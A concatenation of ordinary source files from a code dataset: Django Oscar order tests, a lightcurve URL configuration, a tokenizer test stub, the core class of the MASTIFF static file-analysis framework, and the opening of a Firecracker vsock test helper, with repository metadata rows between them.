    def test_system_notes_are_not_editable(self):
        note = self.order.notes.create(note_type=OrderNote.SYSTEM, message='test')
        self.assertFalse(note.is_editable())
    def test_non_system_notes_are_editable(self):
        note = self.order.notes.create(message='test')
        self.assertTrue(note.is_editable())
    def test_notes_are_not_editable_after_timeout(self):
        # Shrink the editable window to 1 second, then simulate 30 seconds
        # passing by patching timezone.now.
        OrderNote.editable_lifetime = 1
        note = self.order.notes.create(message='test')
        self.assertTrue(note.is_editable())
        now = timezone.now()
        with mock.patch.object(timezone, 'now') as mock_timezone:
            mock_timezone.return_value = now + timedelta(seconds=30)
            self.assertFalse(note.is_editable())
class LineTests(TestCase):
    """Tests for order Line shipping status, driven by shipping events.

    The fixture order has a single line with quantity 4 (one product at
    10.00 added four times).
    """
    def setUp(self):
        basket = create_basket(empty=True)
        add_product(basket, D('10.00'), 4)
        self.order = create_order(number='100002', basket=basket)
        self.line = self.order.lines.all()[0]
        self.order_placed, __ = ShippingEventType.objects.get_or_create(
            code='order_placed', name='Order placed')
        self.dispatched, __ = ShippingEventType.objects.get_or_create(
            code='dispatched', name='Dispatched')
    def tearDown(self):
        ShippingEventType.objects.all().delete()
    def event(self, type, quantity=None):
        """
        Creates a shipping event of the given type for the test line,
        defaulting to the line's full quantity.
        """
        event = ShippingEvent.objects.create(order=self.order, event_type=type)
        if quantity is None:
            quantity = self.line.quantity
        ShippingEventQuantity.objects.create(
            event=event, line=self.line, quantity=quantity)
    def test_shipping_event_history(self):
        self.event(self.order_placed, 3)
        self.event(self.dispatched, 1)
        history = self.line.shipping_event_breakdown
        self.assertEqual(3, history['Order placed']['quantity'])
        self.assertEqual(1, history['Dispatched']['quantity'])
    def test_shipping_status_is_empty_to_start_with(self):
        self.assertEquals('', self.line.shipping_status)
    def test_shipping_status_after_full_line_event(self):
        self.event(self.order_placed)
        self.assertEquals(self.order_placed.name, self.line.shipping_status)
    def test_shipping_status_after_two_full_line_events(self):
        # The most recent full event determines the status.
        type1 = self.order_placed
        self.event(type1)
        type2 = self.dispatched
        self.event(type2)
        self.assertEquals(type2.name, self.line.shipping_status)
    def test_shipping_status_after_partial_line_event(self):
        # Partial events are reported with an "(m/n items)" suffix.
        type = self.order_placed
        self.event(type, 3)
        expected = "%s (%d/%d items)" % (type.name, 3, self.line.quantity)
        self.assertEquals(expected, self.line.shipping_status)
    def test_has_passed_shipping_status_after_full_line_event(self):
        type = self.order_placed
        self.event(type)
        self.assertTrue(self.line.has_shipping_event_occurred(type))
    def test_has_passed_shipping_status_after_partial_line_event(self):
        # An event covering fewer than all items does not count as passed.
        type = self.order_placed
        self.event(type, self.line.quantity - 1)
        self.assertFalse(self.line.has_shipping_event_occurred(type), 1)
    def test_has_passed_shipping_status_after_multiple_line_event(self):
        event_types = [ShippingEventType.objects.get(code='order_placed'),
                       ShippingEventType.objects.get(code='dispatched')]
        for type in event_types:
            self.event(type)
        for type in event_types:
            self.assertTrue(self.line.has_shipping_event_occurred(type))
    def test_inconsistent_shipping_status_setting(self):
        # Total event quantity may not exceed the line quantity.
        type = self.order_placed
        self.event(type, self.line.quantity - 1)
        with self.assertRaises(InvalidShippingEvent):
            self.event(type, self.line.quantity)
    def test_inconsistent_shipping_quantities(self):
        type = ShippingEventType.objects.get(code='order_placed')
        self.event(type, self.line.quantity - 1)
        with self.assertRaises(InvalidShippingEvent):
            # Total quantity is too high
            self.event(type, 2)
class LineStatusTests(TestCase):
    """Tests for Line status transitions via the class-level pipeline.

    NOTE(review): unlike OrderStatusPipelineTests, there is no tearDown
    resetting Line.pipeline — the mutated class attribute may leak into
    other test cases.
    """
    def setUp(self):
        # Allowed transitions: A -> B/C, B -> C.
        Line.pipeline = {'A': ('B', 'C'),
                         'B': ('C',)}
        self.order = create_order()
        self.line = self.order.lines.all()[0]
        self.line.status = 'A'
        self.line.save()
    def test_all_statuses_class_method(self):
        self.assertEqual(['A', 'B'], Line.all_statuses())
    def test_invalid_status_set_raises_exception(self):
        with self.assertRaises(InvalidLineStatus):
            self.line.set_status('D')
    def test_set_status_changes_status(self):
        self.line.set_status('C')
        self.assertEqual('C', self.line.status)
    def test_setting_same_status_does_nothing(self):
        self.line.set_status('A')
class ShippingEventTypeTests(TestCase):
    """Tests for ShippingEventType model behaviour."""
    def tearDown(self):
        ShippingEventType.objects.all().delete()
    def test_code_is_set_automatically(self):
        # The code should be derived (slugified) from the name when omitted.
        etype = ShippingEventType.objects.create(name='Returned')
        self.assertEqual('returned', etype.code)
class ShippingEventQuantityTests(TestCase):
    """Tests for ShippingEventQuantity defaults and prerequisite handling."""
    def setUp(self):
        basket = create_basket(empty=True)
        add_product(basket, D('10.00'), 4)
        self.order = create_order(number='100002', basket=basket)
        self.line = self.order.lines.all()[0]
        self.shipped, __ = ShippingEventType.objects.get_or_create(
            name='Shipped')
        self.returned, __ = ShippingEventType.objects.get_or_create(
            name='Returned')
    def tearDown(self):
        ShippingEventType.objects.all().delete()
    def test_quantity_defaults_to_all(self):
        # When no quantity is given, the event covers the full line quantity.
        event = self.order.shipping_events.create(event_type=self.shipped)
        event_quantity = ShippingEventQuantity.objects.create(event=event, line=self.line)
        self.assertEquals(self.line.quantity, event_quantity.quantity)
    def test_event_is_created_ok_when_prerequisites_are_met(self):
        # A 'Returned' event is valid once the line has been fully shipped.
        shipped_event = self.order.shipping_events.create(event_type=self.shipped)
        ShippingEventQuantity.objects.create(event=shipped_event,
                                             line=self.line)
        event = self.order.shipping_events.create(event_type=self.returned)
        ShippingEventQuantity.objects.create(event=event,
                                             line=self.line,
                                             quantity=1)
class TestOrderDiscount(TestCase):
    """Tests for the OrderDiscount model and its offer/voucher snapshots."""
    def test_can_be_created_without_offer_or_voucher(self):
        order = create_order(number='100002')
        discount = OrderDiscount.objects.create(order=order, amount=D('10.00'))
        # assertIsNone/assertEqual replace the non-idiomatic
        # assertTrue(x is None) and the deprecated assertEquals alias.
        self.assertIsNone(discount.voucher)
        self.assertIsNone(discount.offer)
        self.assertEqual(discount.description(), u'')
    def test_can_be_created_with_an_offer(self):
        offer = create_offer()
        order = create_order(number='100002')
        discount = OrderDiscount.objects.create(order=order, amount=D('10.00'),
                                                offer_id=offer.id)
        self.assertEqual(offer.id, discount.offer.id)
        self.assertEqual(offer.name, discount.offer_name)
    def test_can_be_created_with_an_offer_and_specified_offer_name(self):
        offer = create_offer(name="My offer")
        order = create_order(number='100002')
        discount = OrderDiscount.objects.create(order=order, amount=D('10.00'),
                                                offer_id=offer.id,
                                                offer_name="Your offer")
        # An explicitly supplied offer_name must win over the offer's own.
        self.assertEqual(offer.id, discount.offer.id)
        self.assertEqual("Your offer", discount.offer_name)
    def test_can_be_created_with_a_voucher(self):
        voucher = create_voucher()
        order = create_order(number='100002')
        discount = OrderDiscount.objects.create(order=order, amount=D('10.00'),
                                                voucher_id=voucher.id)
        self.assertEqual(voucher.id, discount.voucher.id)
        self.assertEqual(voucher.code, discount.voucher_code)
    def test_can_be_created_with_a_voucher_and_specified_voucher_code(self):
        # (method name typo "specidied" fixed)
        voucher = create_voucher()
        order = create_order(number='100002')
        discount = OrderDiscount.objects.create(order=order, amount=D('10.00'),
                                                voucher_id=voucher.id,
                                                voucher_code="anothercode")
        # An explicitly supplied voucher_code must win over the voucher's own.
        self.assertEqual(voucher.id, discount.voucher.id)
        self.assertEqual('anothercode', discount.voucher_code)
    def test_contains_offer_details_after_offer_is_deleted(self):
        # The discount keeps a denormalised copy of the offer name, so the
        # description survives deletion of the offer itself.
        offer = create_offer(name="Get 200% off")
        order = create_order(number='100002')
        discount = OrderDiscount.objects.create(order=order, amount=D('10.00'),
                                                offer_id=offer.id)
        offer.delete()
        self.assertIsNone(discount.voucher)
        self.assertIsNone(discount.offer)
        self.assertEqual(discount.description(), u'Get 200% off')
    def test_contains_voucher_details_after_voucher_is_deleted(self):
        # Same denormalisation guarantee for the voucher code.
        voucher = create_voucher()
        order = create_order(number='100002')
        discount = OrderDiscount.objects.create(order=order, amount=D('10.00'),
                                                voucher_id=voucher.id)
        voucher.delete()
        self.assertIsNone(discount.voucher)
        self.assertIsNone(discount.offer)
        self.assertEqual(discount.description(), voucher.code)
| 38.965732 | 94 | 0.660777 |
ace94efd4ac2262d54ee8b49b75decc98173fa69 | 1,619 | py | Python | lightcurve/urls.py | typpo/astrokit | f3c16f73ac842be26cdf20231ac5b915ab68e68f | [
"MIT"
] | 8 | 2016-01-23T11:06:10.000Z | 2021-06-27T01:38:19.000Z | lightcurve/urls.py | typpo/astrokit | f3c16f73ac842be26cdf20231ac5b915ab68e68f | [
"MIT"
] | 119 | 2017-02-06T18:41:47.000Z | 2022-01-13T00:43:35.000Z | lightcurve/urls.py | typpo/astrokit | f3c16f73ac842be26cdf20231ac5b915ab68e68f | [
"MIT"
] | 7 | 2016-07-19T15:49:17.000Z | 2020-10-03T05:53:52.000Z | from django.conf.urls import patterns, url
# URL routes for the lightcurve app: each pattern captures a numeric
# lightcurve id and dispatches to the matching view in lightcurve.views.
# NOTE(review): django.conf.urls.patterns() with string view names only
# exists in old Django releases (deprecated in 1.8, removed in 1.10) --
# this module targets one of those older versions.
urlpatterns = patterns('lightcurve.views',
    url(r'^(?P<lightcurve_id>[0-9]+)/edit$', 'edit_lightcurve', name='edit_lightcurve'),
    url(r'^(?P<lightcurve_id>[0-9]+)/images$', 'images', name='images'),
    url(r'^(?P<lightcurve_id>[0-9]+)/plot$', 'plot_lightcurve', name='plot_lightcurve'),
    url(r'^(?P<lightcurve_id>[0-9]+)/plot_json$', 'plot_lightcurve_json', name='plot_lightcurve_json'),
    url(r'^(?P<lightcurve_id>[0-9]+)/status$', 'status', name='status'),
    url(r'^(?P<lightcurve_id>[0-9]+)/save_observation_default$', 'save_observation_default', name='save_observation_default'),
    url(r'^(?P<lightcurve_id>[0-9]+)/apply_photometry_settings$', 'apply_photometry_settings', name='apply_photometry_settings'),
    url(r'^(?P<lightcurve_id>[0-9]+)/save_image_pairs$', 'save_image_pairs', name='save_image_pairs'),
    url(r'^(?P<lightcurve_id>[0-9]+)/add_images$', 'add_images', name='add_images'),
    url(r'^(?P<lightcurve_id>[0-9]+)/add_image_toggle$', 'add_image_toggle', name='add_image_toggle'),
    url(r'^(?P<lightcurve_id>[0-9]+)/comparison_desigs$', 'comparison_desigs', name='comparison_desigs'),
    url(r'^(?P<lightcurve_id>[0-9]+)/edit_lightcurve_name$', 'edit_lightcurve_name', name='edit_lightcurve_name'),
    url(r'^(?P<lightcurve_id>[0-9]+)/download$', 'download', name='download'),
    url(r'^(?P<lightcurve_id>[0-9]+)/run_image_reductions$', 'run_image_reductions', name='run_image_reductions'),
    url(r'^my-lightcurve$', 'my_lightcurve', name='my_lightcurve'),
    url(r'^all-lightcurve$', 'all_lightcurve', name='all_lightcurve'),
)
| 77.095238 | 129 | 0.692403 |
ace94fdd1a5d1a726c3840db2b66e4f0a053e05c | 193 | py | Python | utils/test_module/custom_tokenization_fast.py | dctelus/transformers | 6786cbc4b14ebff0ac59c768cadd109391db9a08 | [
"Apache-2.0"
] | 8,028 | 2018-11-05T15:19:44.000Z | 2019-07-16T09:14:59.000Z | utils/test_module/custom_tokenization_fast.py | arron1227/transformers | b18dfd95e1f60ae65a959a7b255fc06522170d1b | [
"Apache-2.0"
] | 731 | 2018-11-05T21:35:52.000Z | 2019-07-16T09:51:26.000Z | utils/test_module/custom_tokenization_fast.py | arron1227/transformers | b18dfd95e1f60ae65a959a7b255fc06522170d1b | [
"Apache-2.0"
] | 2,106 | 2018-11-05T15:29:15.000Z | 2019-07-16T08:51:57.000Z | from transformers import BertTokenizerFast
from .custom_tokenization import CustomTokenizer
class CustomTokenizerFast(BertTokenizerFast):
    """Fast (Rust-backed) tokenizer whose slow counterpart is `CustomTokenizer`."""
    # Slow tokenizer class this fast tokenizer converts from/to.
    slow_tokenizer_class = CustomTokenizer
| 21.444444 | 48 | 0.84456 |
ace95027e1cc1f56614eaa0fc86d67b5c4aed8bb | 21,500 | py | Python | mastiff/core.py | tt1379/mastiff | 04d569e4fa59513572e77c74b049cad82f9b0310 | [
"Apache-2.0"
] | 164 | 2015-02-09T18:19:26.000Z | 2022-02-23T09:49:18.000Z | mastiff/core.py | ashishhmittal/mastiff | 04d569e4fa59513572e77c74b049cad82f9b0310 | [
"Apache-2.0"
] | 1 | 2016-05-20T16:21:33.000Z | 2016-05-20T16:21:33.000Z | mastiff/core.py | ashishhmittal/mastiff | 04d569e4fa59513572e77c74b049cad82f9b0310 | [
"Apache-2.0"
] | 43 | 2015-03-03T11:15:58.000Z | 2021-10-02T02:14:57.000Z | #!/usr/bin/env python
"""
Copyright 2012-2013 The MASTIFF Project, All Rights Reserved.
This software, having been partly or wholly developed and/or
sponsored by KoreLogic, Inc., is hereby released under the terms
and conditions set forth in the project's "README.LICENSE" file.
For a list of all contributors and sponsors, please refer to the
project's "README.CREDITS" file.
"""
__doc__ = """
MASTIFF - MAlicious Static Inspection File Framework
This module implements the primary class for static analysis inspection.
Mastiff member variables:
cat_paths: List that contains the path to the category plug-ins.
plugin_paths: List that contains the paths to the analysis plug-ins.
filetype: Dictionary used to store the output from the file-type identification
functions.
file_name: full path to the file being analyzed.
hashes: Tuple of the MD5, SHA1 and SHA256 hashes of the file being analyzed.
This is also stored in the configuration file.
db: Sqlite3 Connection class to the database file.
cat_list: List that contains all of the category plug-ins to be used during
analysis.
activated_plugins: List that contains all of the plug-ins that have been
activated. This order of the plug-ins in this list is the order they will run.
cat_manager: Yapsy PluginManager class that manages the category plug-ins.
plugin_manager: Yapsy PluginManager class that manages the analysis plug-ins.
Mastiff member functions:
__init__(self, config_file=None, fname=None, loglevel=logging.INFO, override=None)
The initialization function of the class. This function will initialize all of the
member variables, set up logging, read in and store the configuration file, and
find and load all plug-ins.
init_file(self, fname)
This function validates the filename being analyzed
to ensure it exists and can be accessed, sets up the directory that all
output will be logged into, and adds initial file information into the
database.
set_filetype(self, fname=None, ftype=None)
Calls the file-type identification helper functions in mastiff/filetype.py,
and loops through all of the category plug-ins to determine which ones will
analyze the file.
validate(self, name, plugin)
Validates an analysis plug-in to ensure that it contains the correct functions.
activate_plugins(self, single_plugin=None)
Loops through all analysis plug-ins for category classes relevant to the file
type being examined and ensures they are valid. If validated, the analysis
plug-in is activated. This function also ensures that any pre-requisite plug-ins
have been activated.
analyze(self, fname=None, single_plugin=None)
Ensures the file type of the file is set up and loops through all activated
analysis plug-ins and calls their analyze() function.
list_plugins(self, type='analysis')
Helper function that loops through all available plug-ins and prints out their
name, path and description. The function can print out analysis or category
plug-in information.
"""
__version__ = "$Id: ace95027e1cc1f56614eaa0fc86d67b5c4aed8bb $"
import sys
import os
import logging
import hashlib
from shutil import copyfile
from operator import attrgetter
import simplejson
if sys.version_info < (2, 6, 6):
sys.stderr.write("Mastiff requires python version 2.6.6")
sys.exit(1)
try:
from yapsy.PluginManager import PluginManager
except ImportError, err:
print "Yapsy not installed or accessible: %s" % err
sys.exit(1)
import mastiff.conf as Conf
import mastiff.filetype as FileType
import mastiff.sqlite as DB
import mastiff.plugins.category.categories as Cats
import mastiff.plugins.analysis as analysis
import mastiff.plugins.output as masOutput
class Mastiff:
    """Primary class for the static analysis inspection framework."""
    def __init__(self, config_file=None, fname=None, loglevel=logging.INFO, override=None):
        """Initialize variables."""
        # configure logging for Mastiff module
        format_ = '[%(asctime)s] [%(levelname)s] [%(name)s] : %(message)s'
        logging.basicConfig(format=format_)
        log = logging.getLogger("Mastiff")
        log.setLevel(loglevel)
        if log.handlers:
            log.handlers = []
        # read in config file
        self.config = Conf.Conf(config_file, override=override)
        # make sure base logging dir exists
        log_dir = self.config.get_var('Dir','log_dir')
        log_dir = os.path.abspath(os.path.expanduser(log_dir))
        if not os.path.isdir(log_dir):
            try:
                os.makedirs(log_dir)
            except OSError, err:
                log.error('Could not make %s: %s. Exiting.', log_dir, err)
                sys.exit(1)
        self.config.set_var('Dir', 'base_dir', log_dir)
        # set up file to log output to
        fh = logging.FileHandler(log_dir + os.sep + 'mastiff.log' )
        fh.setFormatter(logging.Formatter(format_))
        log.addHandler(fh)
        fh.setLevel(loglevel)
        # verbose logging set in the config and not command line?
        if self.config.get_bvar('Misc','verbose') == True and \
            loglevel != logging.ERROR:
            log.setLevel(logging.DEBUG)
            fh.setLevel(logging.DEBUG)
        # get path to category plugins
        self.cat_paths = [ os.path.dirname(Cats.__file__) ]
        self.output_paths = [ os.path.dirname(masOutput.__file__) ]
        # convert plugin paths to list
        self.plugin_paths = [ os.path.dirname(analysis.__file__)]
        # strip whitespace from dirs
        for tmp in str(self.config.get_var('Dir','plugin_dir')).split(','):
            if tmp:
                self.plugin_paths.append(os.path.expanduser(tmp.lstrip().rstrip()))
        # do the same for output plugins
        for tmp in str(self.config.get_var('Dir','output_plugin_dir')).split(','):
            if tmp:
                self.output_paths.append(os.path.expanduser(tmp.lstrip().rstrip()))
        # Per-run state: file-type info dict, target path, the
        # (md5, sha1, sha256) tuple, chosen category names and the
        # ordered list of activated analysis plug-ins.
        self.filetype = dict()
        self.file_name = None
        self.hashes = None
        self.cat_list = list()
        self.activated_plugins = list()
        # Build the managers
        self.cat_manager = PluginManager()
        self.plugin_manager = PluginManager()
        self.output_manager = PluginManager()
        # Find and load all category plugins
        cat_filter = dict()
        self.cat_manager.setPluginPlaces(self.cat_paths)
        self.cat_manager.collectPlugins()
        # Import all of the modules for the categories so we can access
        # their classes.
        for pluginInfo in self.cat_manager.getAllPlugins():
            log.debug('Found category: %s', pluginInfo.name)
            try:
                mod_name = "mastiff.plugins.category.%s" % \
                           os.path.basename(pluginInfo.path)
                cat_mod = __import__(mod_name,
                                     fromlist=["mastiff.plugins.category"])
            except ImportError, err:
                log.error("Unable to import category %s: %s",
                          pluginInfo.name,
                          err)
                self.cat_manager.deactivatePluginByName(pluginInfo.name)
                continue
            else:
                # We were able to import it, activate it
                self.cat_manager.activatePluginByName(pluginInfo.name)
                log.debug("Activated category: %s", pluginInfo.name)
            # Cat is imported, add class to the category filter
            # cat_filter will be a dict in the form:
            # { cat_name: cat_class }
            # and contains all the category plugins that have been activated
            cat_class = getattr(cat_mod,
                                pluginInfo.plugin_object.__class__.__name__)
            cat_filter.update({pluginInfo.plugin_object.cat_name: cat_class})
        #log.debug("Category Filters: %s", cat_filter)
        # Now collect and load all analysis plugins
        self.plugin_manager.setPluginPlaces(self.plugin_paths)
        self.plugin_manager.setCategoriesFilter( cat_filter )
        self.plugin_manager.collectPlugins()
        # Finally collect all output plugins
        self.output_manager.setPluginPlaces(self.output_paths)
        self.output_manager.collectPlugins()
        # set up database
        self.db = DB.open_db_conf(self.config)
        DB.create_mastiff_tables(self.db)
        # set up the output object
        # keyed by hash tuple -> category name -> plugin name -> output page
        self.output = dict()
        # init the filename if we have it
        if fname is not None:
            self.init_file(fname)
    def __del__(self):
        """
        Class destructor.
        """
        # Close down all logging file handles so we don't have any open file descriptors
        log = logging.getLogger("Mastiff")
        handles = list(log.handlers)
        for file_handle in handles:
            log.removeHandler(file_handle)
            file_handle.close()
    def init_file(self, fname):
        """
        Validate the filename to ensure it can be accessed and set
        up class variables.
        This function is called when a filename is given or can be
        called directly.
        Returns the (md5, sha1, sha256) tuple on success, or None if the
        file could not be read.
        """
        log = logging.getLogger("Mastiff.Init_File")
        if fname is None:
            return None
        try:
            with open(fname, 'rb') as my_file:
                data = my_file.read()
        except IOError, err:
            log.error("Could not open file: %s", err)
            return None
        self.file_name = fname
        # create tuple of md5, sha1 and sha256 hashes
        self.hashes = hashlib.md5(data).hexdigest(), \
                      hashlib.sha1(data).hexdigest(), \
                      hashlib.sha256(data).hexdigest()
        self.config.set_var('Misc', 'hashes', self.hashes)
        self.output[self.hashes] = dict()
        # update log_dir
        # per-sample output goes into a subdirectory named after the MD5
        log_dir = os.path.abspath(os.path.expanduser(self.config.get_var('Dir','log_dir'))) + \
                  os.sep + \
                  self.hashes[0]
        self.config.set_var('Dir', 'log_dir', log_dir)
        # create log dir
        if not os.path.exists(log_dir):
            try:
                os.makedirs(log_dir)
            except OSError, err:
                log.error('Could not make %s: %s. Exiting.', log_dir, err)
                sys.exit(1)
        # lets set up the individual log file
        # we may miss out on a couple prior logs, but thats OK
        log = logging.getLogger('Mastiff')
        fh = logging.FileHandler(log_dir + os.sep + 'mastiff.log' )
        format_ = '[%(asctime)s] [%(levelname)s] [%(name)s] : %(message)s'
        fh.setFormatter(logging.Formatter(format_))
        log.addHandler(fh)
        fh.setLevel(logging.INFO)
        log = logging.getLogger("Mastiff.Init_File")
        log.info('Analyzing %s.', self.file_name)
        log.info("Log Directory: %s", log_dir)
        # copy file to the log directory
        if self.config.get_bvar('Misc', 'copy') is True:
            try:
                copyfile(self.file_name, log_dir + os.sep + os.path.basename(self.file_name) + '.VIR')
            except IOError, err:
                log.error('Unable to copy file: %s', err)
            log.debug('Copied file to log directory.')
        else:
            log.debug('Configuration set to not copy file.')
        # add entry to database if it exists
        if self.db is not None:
            log.debug('Adding entry to database.')
            DB.insert_mastiff_item(self.db, self.hashes)
        return self.hashes
    def activate_plugins(self, single_plugin=None):
        """
        Activate all plugins that are in the categories we selected.
        If single_plugin is given, only activate that plug-in.
        Note: File Information plug-in is ALWAYS run.
        """
        has_prereq = list()
        for cats in self.cat_list:
            log = logging.getLogger('Mastiff.Plugins.Activate')
            log.debug('Activating plugins for category %s.', cats)
            self.output[self.hashes][cats] = dict()
            for plugin in self.plugin_manager.getPluginsOfCategory(cats):
                # check if we are running a single plugin - file information always gets run
                if single_plugin is not None and single_plugin != plugin.name and plugin.name != 'File Information':
                    continue
                plugin.plugin_object.set_name(plugin.name)
                log.debug('Validating plugin "%s"', plugin.name)
                # if the plugin validates, try to activate it
                if self.validate(plugin.name, plugin.plugin_object) == True:
                    if plugin.plugin_object.prereq is not None:
                        # this plugin has a pre-req, can't activate yet
                        has_prereq.append([cats, plugin])
                    else:
                        log.debug('Activating "%s".', plugin.name)
                        self.plugin_manager.activatePluginByName(plugin.name, cats)
                        self.activated_plugins.append(plugin)
                else:
                    log.debug("Removing plugin %s %s.", plugin.name, cats)
                    self.plugin_manager.deactivatePluginByName(plugin.name,
                                                               cats)
        # now try to activate any plug-ins that have pre-reqs
        # Keep re-scanning until a full pass activates nothing new, so
        # chains of pre-reqs resolve in dependency order.
        # NOTE(review): has_prereq is mutated (remove) while being iterated,
        # which can skip elements within one pass; the outer while-flag loop
        # re-runs the scan so skipped entries are still picked up eventually.
        flag = True
        while flag is True:
            flag = False
            for plugins in has_prereq:
                # check to see if the pre-req in in the activated list
                inact = [p for p in self.activated_plugins if p.name == plugins[1].plugin_object.prereq]
                if len(inact) > 0:
                    # our pre-req has been activated, we can activate ourself
                    log.debug('Activating "%s". Pre-req fulfilled.', plugins[1].name)
                    self.plugin_manager.activatePluginByName(plugins[1].name, plugins[0])
                    self.activated_plugins.append(plugins[1])
                    has_prereq.remove(plugins)
                    flag = True
        # list out any plugins that were not activated due to missing pre-reqs
        for plugins in has_prereq:
            log.debug("Plugin %s not activated due to missing pre-req \"%s.\"" % \
                (plugins[1].name, plugins[1].plugin_object.prereq ))
        # finally activate the output plugins
        for plugin in self.output_manager.getAllPlugins():
            plugin.plugin_object.set_name(plugin.name)
            log.debug('Activating Output Plug-in "{}"'.format(plugin.name))
            self.output_manager.activatePluginByName(plugin.name)
            #self.activated_plugins.append(plugin)
    def list_plugins(self, ctype='analysis'):
        """Print out a list of analysis or cat plugins."""
        if ctype == 'analysis':
            # analysis plug-ins
            print "Analysis Plug-in list:\n"
            print "%-25s\t%-15s\t%-25s\n%-50s" % \
                  ("Name", "Category", "Description", "Path")
            print '-' * 80
            for plugin in sorted(self.plugin_manager.getAllPlugins(),
                                 key=attrgetter('plugin_object.cat_name', 'name')):
                print "%-25s\t%-15s\t%-12s\n%-80s\n" % \
                      (plugin.name, plugin.plugin_object.cat_name, \
                       plugin.description, plugin.path)
        elif ctype == 'cat':
            print "Category Plug-in list:\n"
            print "%-25s\t%-15s\t%-s" % ("Name", "FType", "Description")
            print '-' * 80
            # category plug-ins
            for plugin in sorted(self.cat_manager.getAllPlugins(),
                                 key=attrgetter('name')):
                print "%-25s\t%-15s\t%-s" % \
                      (plugin.name, plugin.plugin_object.cat_name,
                       plugin.description)
        elif ctype == 'output':
            print "Output Plug-in list:\n"
            print "%-25s\t%-s\n%s" % ("Name", "Description", "Path")
            print '-' * 80
            # output plug-ins
            for plugin in sorted(self.output_manager.getAllPlugins(),
                                 key=attrgetter('name')):
                print "%-25s\t%-s\n%-80s\n" % \
                      (plugin.name, plugin.description, plugin.path)
        else:
            print "Unknown plugin type."
    def set_filetype(self, fname=None, ftype=None):
        """
        Calls the filetype functions and loops through the category
        plug-ins to see which ones will handle this file.
        Returns the filetype dict ('magic' and 'trid' keys).
        """
        log = logging.getLogger('Mastiff.FileType')
        if fname is None and self.file_name is None:
            log.error("No file to analyze has been specified. Exiting.")
            sys.exit(1)
        elif fname is not None and self.file_name is None:
            if self.init_file(fname) is None:
                log.error("ERROR accessing file. Exiting.")
                sys.exit(1)
        if self.cat_list:
            # if self.cat_list is already set, assume that we've already
            # gone through this function
            return self.filetype
        if ftype is not None:
            # we are forcing a file type to run
            log.info('Forcing category plug-in "%s" to be added.', ftype)
            self.cat_list.append(ftype)
        # Grab the magic file type of the file. This is done here so as not
        # to do it in every category plug-in.
        self.filetype['magic'] = FileType.get_magic(self.file_name)
        # Grab the TrID type
        trid_opts = self.config.get_section('File ID')
        self.filetype['trid'] = list()
        if trid_opts['trid']:
            self.filetype['trid'] = FileType.get_trid(self.file_name,
                                                      trid_opts['trid'],
                                                      trid_opts['trid_db'])
        # Cycle through all of the categories and see if they should be added
        # to the list of categories to be run.
        for pluginInfo in self.cat_manager.getAllPlugins():
            cat_name = pluginInfo.plugin_object.is_my_filetype(self.filetype,
                                                               self.file_name)
            log.debug('Checking cat %s for filetype.', pluginInfo.name)
            if cat_name is not None:
                # cat_list contains analysis plugin categories to be used
                self.cat_list.append(cat_name)
                log.debug('Adding %s to plugin selection list.', cat_name)
        # add file type to the DB
        if self.db is not None:
            DB.insert_mastiff_item(self.db, self.hashes, self.cat_list)
        return self.filetype
    def validate(self, name, plugin):
        """Return false if a plugin does not have the correct functions."""
        log = logging.getLogger('Mastiff.Plugins.Validate')
        # NOTE(review): callable() here only serves to trigger an
        # AttributeError when the attribute is missing; its boolean result
        # is discarded, so a non-callable attribute would still pass.
        # Likely intended: "if not callable(plugin.activate): return False".
        try:
            callable(plugin.activate)
        except AttributeError:
            log.error("%s missing activate function.", name)
            return False
        try:
            callable(plugin.deactivate)
        except AttributeError:
            log.error("%s missing deactivate function.", name)
            return False
        try:
            callable(plugin.analyze)
        except AttributeError:
            log.error("%s missing analyze function.", name)
            return False
        return True
    def analyze(self, fname=None, single_plugin=None):
        """Perform analysis on a given filename."""
        log = logging.getLogger('Mastiff.Analysis')
        if fname is None and self.file_name is None:
            log.error("No filename specified. Exiting.")
            sys.exit(1)
        elif fname is not None and self.file_name is None:
            # first time seeing the file, initialize it
            if self.init_file(fname) is None:
                log.error("ERROR accessing file. Exiting.")
                return False
        # set the file_type
        # NOTE(review): 'ftype' is unused; set_filetype() also caches its
        # result in self.filetype, which is what is checked below.
        ftype = self.set_filetype()
        log.info('File categories are %s.', self.cat_list)
        if not self.filetype:
            log.error("The file type has not been set. Exiting.")
            sys.exit(1)
        # activate the plugins
        self.activate_plugins(single_plugin)
        for plugin in self.activated_plugins:
            # skip if plugin is not activated
            if plugin.is_activated == False:
                continue
            log.debug('Calling plugin "%s".', plugin.name)
            # set the output results to be an attribute of the plugin so it can analyze it
            setattr(plugin.plugin_object, 'results', self.output[self.hashes])
            # analyze the plugin - if plugin is compliant with universal output
            # its output will be returned
            plug_out = plugin.plugin_object.analyze(self.config, self.file_name)
            if plug_out is not False and plug_out is not None and isinstance(plug_out, masOutput.page):
                # add the plugin output to its own entry
                self.output[self.hashes][plugin.plugin_object.cat_name][plugin.plugin_object.name] = plug_out
        # go through output plugins and output the data
        for plugin in self.output_manager.getAllPlugins():
            plugin.plugin_object.output(self.config, self.output)
        self.config.dump_config()
        log.info('Finished analysis for %s.', self.file_name)
# end class mastiff
| 38.738739 | 116 | 0.608326 |
ace9514ecd3fbe08a535278557a034a412478c3a | 8,344 | py | Python | tests/framework/utils_vsock.py | psalaberria002/firecracker | 86340cb109d7eb1174bb080ef0bcb0aadc80b0f9 | [
"Apache-2.0"
] | 17,668 | 2018-11-27T04:47:42.000Z | 2022-03-31T21:28:10.000Z | tests/framework/utils_vsock.py | psalaberria002/firecracker | 86340cb109d7eb1174bb080ef0bcb0aadc80b0f9 | [
"Apache-2.0"
] | 1,661 | 2018-11-27T05:44:54.000Z | 2022-03-31T19:27:28.000Z | tests/framework/utils_vsock.py | psalaberria002/firecracker | 86340cb109d7eb1174bb080ef0bcb0aadc80b0f9 | [
"Apache-2.0"
] | 1,407 | 2018-11-27T05:06:02.000Z | 2022-03-31T13:29:44.000Z | # Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""Helper functions for testing vsock device."""
import hashlib
import os.path
from select import select
from socket import socket, AF_UNIX, SOCK_STREAM
from threading import Thread, Event
import re
from host_tools.network import SSHConnection
ECHO_SERVER_PORT = 5252
SERVER_ACCEPT_BACKLOG = 128
TEST_CONNECTION_COUNT = 50
BLOB_SIZE = 20 * 1024 * 1024
BUF_SIZE = 64 * 1024
class HostEchoServer(Thread):
    """A simple "echo" server for vsock.

    This server will accept incoming connections (initiated by the guest vm),
    and, for each connection, it will read any incoming data and then echo it
    right back.
    """

    def __init__(self, vm, path):
        """Bind a Unix listener at `path` and expose it inside the VM jail."""
        super().__init__()
        self.vm = vm
